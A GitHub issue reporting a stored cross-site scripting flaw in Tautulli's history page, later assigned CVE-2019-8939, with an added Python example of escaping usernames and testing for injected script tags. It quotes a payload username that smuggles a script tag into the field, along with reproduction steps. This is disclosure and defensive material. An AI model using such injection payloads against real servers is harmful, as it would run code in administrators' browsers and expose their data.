Insufficient username filtering in history.html allows XSS and data exfiltration #161

geeknik opened this issue Feb 19, 2019 · 1 comment



commented Feb 19, 2019


What you did?
I changed my Plex username to geeknik"><script src=></script>.

What happened?
Tautulli does not filter out JavaScript when reading usernames and when the admin visits the History page, the JavaScript is executed in the context of said admin.

Lines 112-128 are vulnerable:

Here we can see how it is reflected:

     <select name="history-user" id="history-user" class="btn" style="color: inherit;">
     <option value="">All Users</option>
     <option disabled="">────────────</option>
     <option value="xxx">user1</option>
     <option value="xxx">user2</option>
     <option value="xxx">user3</option>
     <option value="xxx">user4</option>
     <option value="xxx">DomitianX</option>
     <option value="xxx">geeknik"&gt;<script src=""></script></option>
     <option value="xxx">user5</option>
     <option value="xxx">user6</option>
     <option value="xxx">user7</option>
     <option value="xxx">user8</option>
     <option value="0">Local</option>
     <option value="xxx">user9</option>
     <option value="xxx">user10</option>
     <option value="xxx">user11</option>
     <option value="xxx">user12</option>
     <option value="xxx">user13</option>
     <option value="xxx">user14</option>
     <option value="xxx">user15</option>
     <option value="xxx">user16</option>
     <option value="xxx">user17</option>
     </select>

What you expected?
I didn't expect my friend's Plex server to leak a bunch of information at me.

How can we reproduce your issue?
Set up a Plex Media Server, install Tautulli, create a normal Plex user account to consume media. Change the user account name to something with JavaScript. Visit the Tautulli History page.
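The report above comes down to a username being written into the `history-user` option list without HTML-escaping. The following is an added example, not Tautulli's code and not part of the original report: it builds the option list both ways and uses a parser to confirm whether a `<script>` element results. The function names, the user IDs and the assumption that the list is assembled by string concatenation are hypothetical; the second username is the one quoted in the report.

```python
import html
from html.parser import HTMLParser

# Constructed sample data; the second name is the username quoted in the report.
USERS = [(1, "user1"), (2, 'geeknik"><script src=></script>')]


def render_options(users, escape):
    """Build the <option> elements of a user filter (hypothetical helper)."""
    parts = []
    for user_id, name in users:
        # html.escape turns < > & " ' into character references, so the
        # name can only ever be parsed as text, never as markup.
        label = html.escape(name, quote=True) if escape else name
        parts.append('<option value="%d">%s</option>' % (user_id, label))
    return "".join(parts)


class MarkupAudit(HTMLParser):
    """Records every start tag and text node found in rendered markup."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.text = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_data(self, data):
        self.text.append(data)


def audit(markup):
    parser = MarkupAudit()
    parser.feed(markup)
    parser.close()
    return parser


def script_tags(markup):
    """Number of <script> elements a parser would create from the markup."""
    return audit(markup).tags.count("script")


if __name__ == "__main__":
    for escape in (False, True):
        rendered = render_options(USERS, escape)
        print("escape=%s script_tags=%d" % (escape, script_tags(rendered)))
```

The same audit can run as a regression test against any template that renders user-controlled display names, so a missed escape fails a test before it reaches a release.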



commented Feb 19, 2019

CVE-2019-8939 has been assigned to this flaw by MITRE.
